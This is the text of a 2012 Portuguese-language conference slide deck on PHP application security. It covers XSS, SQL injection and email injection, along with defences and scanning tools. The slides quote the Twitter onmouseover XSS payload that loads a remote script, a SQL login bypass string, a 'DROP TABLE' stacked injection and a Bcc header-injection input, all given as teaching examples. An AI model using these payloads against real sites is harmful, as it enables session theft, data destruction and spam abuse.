1. Segurana em aplicaes PHP Rodrigo dos Santosrodrigodossantos.ws @rosantoz

2. Sobre mim Desenvolvedor PHP desde 2004 Zend Certified Engineer PHP 5.3 Zend Framework Certified Ps Graduado em Engenharia de Projetos de Software Scio-Proprietrio na Ilha Web (www.ilhaweb.net)PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 3. O que iremos abordar? Como acontecem os principais ataques a aplicaes PHP; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 4. O que iremos abordar? Como acontecem os principais ataques a aplicaes PHP; Como se previnir; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 5. O que iremos abordar? Como acontecem os principais ataques a aplicaes PHP; Como se previnir; Ferramentas de diagnstico (e de ataque); PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 6. 3 Regras Bsicas de Segurana PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 7. 3 Regras Bsicas de Segurana1) Filtre e valide os dados de entrada; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 8. 3 Regras Bsicas de Segurana1) Filtre e valide os dados de entrada;2) Escape os dados de sada; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 9. 3 Regras Bsicas de Segurana1) Filtre e valide os dados de entrada;2) Escape os dados de sada;3) Nunca confie em seus usurios; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 10. XSS Cross-Site Scripting PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 11. XSS Cross-Site ScriptingInjeo de cdigo HTML, CSS ouJavascript em uma pgina. PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 12. XSS Cross-Site ScriptingO javascript representa a maior ameaa por possibilitar:1) Redirecionar o usurio para outra pgina;2) Modificar a pgina;3) Ler os cookies.PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 13. XSS Cross-Site ScriptingMas como acontece?PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 14. XSS Cross-Site ScriptingMas como acontece?PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 15. XSS Cross-Site Scripting Twitter Hackhttp://edition.cnn.com/2010/TECH/social.media/09/21/twitter.security.flaw/index.html PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 16. XSS Cross-Site ScriptingTwitter Hack http://t.co/@"style="font- size:999999999999px;"onmouseover="$.getScript (http:u002fu002fis.gdu002ffl9A7)"/PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 17. XSS Cross-Site ScriptingComo evitar? htmlspecialchars() htmlentities() strip_tags() Whitelist PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 18. XSS Cross-Site ScriptingFerramenta de diagnstico:PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 19. SQL Injection PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 20. SQL Injection Injeo de uma instruo SQLatravs de parmetros recebidospela por um sistema. PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 21. SQL Injection PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 22. SQL InjectionMas como acontece?PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 23. SQL InjectionMas como acontece?PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 24. SQL InjectionMas como acontece?usurio: qualquersenha:OR = PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 25. SQL InjectionMas como acontece?usurio: qualquersenha:OR = PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 26. SQL InjectionMas como acontece?usurio: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 27. SQL InjectionMas como acontece?usurio: qualquer; DROP TABLE usuarios ; --senha: 1234 PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 28. SQL InjectionComo evitar? mysql_real_escape_string() Prepared Statement PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 29. SQL InjectionSQL Injection no mundo realPHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 30. SQL InjectionFerramenta de diagnstico:PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 31. Email InjectionComo acontece:PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 32. Email InjectionComo acontece:Campo nome:Jos da Silva nBcc ,, PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 33. Email InjectionComo evitar: Valide o email do usrio; No use mail() para enviar email; PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 34. Ferramentas de Diagnstico XSS Me https://addons.mozilla.org/en-US/firefox/addon/xss-me/ PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 35. Ferramentas de Diagnstico SQL Inject Me https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 36. Ferramentas de Diagnstico Skipfish http://code.google.com/p/skipfish/downloads/list PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 37. Ferramentas de Diagnstico Acunetix (free edition) http://www.acunetix.com/cross-site-scripting/scanner.htm PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 38. Ferramentas de DiagnsticoZAPcode.google.com/p/zaproxy/ PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 39. RecomendaoOWASPhttps://www.owasp.org PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 40. Perguntas?PHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012 41. Obrigado@rosantozfalecom@rodrigodossantos.wsPHPSC Conference 2012 Segurana em aplicaes PHP - @rosantoz 27/10/2012